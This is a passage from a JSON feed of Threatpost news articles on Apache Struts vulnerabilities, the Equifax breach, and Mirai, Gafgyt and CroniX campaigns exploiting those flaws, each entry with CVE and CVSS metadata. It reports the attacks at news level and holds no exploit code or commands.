stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So 